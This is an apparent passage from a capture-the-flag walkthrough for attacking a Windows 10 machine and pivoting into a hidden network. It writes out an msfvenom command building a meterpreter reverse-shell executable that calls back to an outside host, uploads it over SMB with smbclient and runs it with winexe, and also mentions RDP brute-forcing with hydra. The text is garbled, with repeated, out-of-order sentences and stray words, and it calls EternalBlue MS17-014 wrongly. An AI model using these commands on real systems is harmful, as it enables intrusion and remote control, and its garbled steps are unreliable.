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Using your preferred scanning tool (e.g., Nmap), scan the target machine's IP address:

As you've identified the target machine as running Windows 10, you can attempt to exploit the EternalBlue vulnerability (MS17-014) using the msfvenom and meterpreter tools.

msfvenom -p windows/x86/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f exe > eternalblue.exe Transfer the executable to the target machine using SMB: hackgennet upd

Use hydra to brute-force the RDP password:

Next, use a tool like enum4linux or smbclient to enumerate SMB shares: Using your preferred scanning tool (e

winexe -U nobody@10.10.11.74 //10.10.11.74 'C:\Users\nobody\Documents\eternalblue.exe' However, this may not work due to Windows 10's mitigations. You can try using other exploit tools like cve-2017-0144 or use an alternative exploitation method.

The goal of the challenge is to access a hidden network. Once you've gained access to the target machine, you can use its network connectivity to pivot into the hidden network. The goal of the challenge is to access a hidden network

smbclient //10.10.11.74/Users -U nobody put eternalblue.exe Execute the malicious executable on the target machine using psexec or winexe :

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